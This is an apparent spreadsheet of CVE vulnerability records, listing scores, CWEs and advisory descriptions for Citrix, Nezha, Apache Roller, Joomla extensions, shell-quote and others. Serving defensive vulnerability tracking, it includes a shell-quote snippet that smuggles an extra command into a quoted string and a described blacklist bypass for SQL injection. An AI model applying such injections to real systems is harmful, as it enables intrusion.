      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-342</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Predictable exact value from previous values vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88778</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.3)</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101032</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>navi through 2.24.0 fails to properly escape cheatsheet variable values when substituting them into shell commands. Attackers can inject shell metacharacters through crafted file names in suggestion command directories to execute arbitrary commands with victim privileges.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101032</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.2)</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88774</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr"/>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to a feature policy bypass due to improper HTTP URL based expression usage.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88774</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101059</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">utcp-http </t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101059</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101085</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.3.8 fails to validate alert rule type and duration bounds, allowing authenticated non-administrator users to create malformed rules that trigger unrecovered panics in the alert evaluator goroutine. Attackers can submit a crafted alert rule via the POST /api/v1/alert-rule endpoint to crash the dashboard process, which persists the rule and causes repeated crashes on restart, disabling all monitoring and control plane functionality.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101085</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101086</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>Nezha Dashboard versions before 2.3.5 fail to restrict service monitor task types to supported probe types, allowing authenticated users with nezha:service:write scope to submit privileged task types through the service API. Attackers can deliver command execution or Agent configuration tasks to Agents within their authorization scope by exploiting the shared protobuf Task.Type namespace between service monitors and privileged operations.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101086</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T174"/>
  <conditionalFormatting sqref="E2:E174">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74">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27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CVE-2026-82377</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Apache Roller 6.1.5 allows an authenticated user to read, modify, or delete weblog content belonging to other weblogs through the legacy XML-RPC Blogger and MetaWeblog APIs, because the handlers authenticate the caller but do not verify the caller's permission on the weblog or entry actually affected. Only installations that enable the non-default global XML-RPC setting are affected; the per-weblog API flag defaults to enabled for UI-created weblogs. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which applies an explicit per-method permission check, or to keep the XML-RPC feature disabled.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82377</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82384</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Deserialization of Untrusted Data in Apache Roller 6.1.5 allows an unauthenticated remote attacker to cause deserialization of attacker-controlled bytes, because the XML-RPC endpoint accepts vendor extension types that are deserialized during request parsing, before authentication. The servlet is mapped unconditionally, so parsing occurs even when the global XML-RPC feature is set to disabled; no non-default configuration is required for this path. This can lead to remote code execution. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which disables the extension types and rejects requests when the XML-RPC feature is disabled.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82384</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88804</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated update of public UI settings could be used by remote attackers to execute a stored cross-site scripting attack in the Rancher UI, in SUSE Rancher 2.15 before 2.15.2, 2.14 before 2.14.6, 2.13 before 2.13.10, 2.12 before 2.12.14 and 2.11 before 2.11.18.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88804</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19759</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>An Incorrect Authorization vulnerability in the task configuration in Google Cloud Application Integration versions prior to 2026-06-17 on Google Cloud Platform allows an authenticated Google Cloud user to execute arbitrary internal RPCs from inside Google's production network under a privileged identity using an internal-only task type.
This vulnerability was patched on 17 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19759</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81867</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in the JavaScript Task in Google Cloud Application Integration versions prior to 2026-06-28 on Google Cloud Platform allows an authenticated user with standard permissions to run arbitrary code on the shared production servers using a specially crafted script bypassing param guards.
This vulnerability was patched on 28 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81867</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100752</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Real Estate Manager (Free) &lt; 6.7.9 - site/realestatemanager.php builds the ORDER BY clause of three separate frontend property-listing queries (category browsing, search results, and the full property listing) from a request-controlled order_field parameter, concatenated directly into an unquoted SQL clause with no allow-list of real column names and no cast.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100752</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101108</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Vehicle Manager (Free) &lt; 6.5.8 - site/vehiclemanager.php reads the order_field and order_direction sort parameters at three separate anonymous-reachable frontend entry points (category listing, search, and the all-vehicles listing) through a sanitizing function that applies real escaping, but the value is then placed into an unquoted ORDER BY clause, where escaping has no protective effect.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101108</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101110</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Book Library (Free) &lt; 6.4.6 - site/booklibrary.php’s books() function reads the field and direction request parameters and passes each through a function called protectInjectionWithoutQuote(), whose only real protection is a keyword blacklist that, on detecting the literal substring select, wraps the value in $db-&gt;quote() instead of rejecting it. The value is then concatenated directly into an unquoted ORDER BY clause, a position where quoting provides no protection at all. Reaching the vulnerable code path requires two conditions: a first request to prime session-stored sort defaults, and a trailing decoy comment (-- xselect) that satisfies the blacklist’s substring check without altering the payload’s effect.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101110</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102422</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function emits a `{ comment }` token as `#` followed by its text, which comments out the rest of the shell line, including the opening quote of any later string token. A line terminator (\n, \r, U+2028, U+2029) in that later string therefore ends the comment, and the rest of the string is parsed as shell input: `quote(['echo', 'ok', { comment: 'x' }, 'a\nid;#'])` runs `id` in sh, bash, dash, ksh and zsh. `parse()` emits a comment token for a `#` in the middle of a word (for example `http://example.com/#frag`), so callers that combine `parse()` output with another untrusted string, such as `quote(parse(untrustedCommand).concat(untrustedArg))`, are affected. The fix for CVE-2026-9277 rejected line terminators in the comment's own text, but not in the tokens after it. Fixed in 1.11.0: `quote()` throws a `TypeError` when a string after a `{ comment }` token contains a line terminator.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102422</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101260</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Ziroom ZHOME A0101 1.0.1.0. Affected by this issue is some unknown functionality of the file /api/ZRnetwork/firstLogin. Performing a manipulation of the argument firstLogin results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
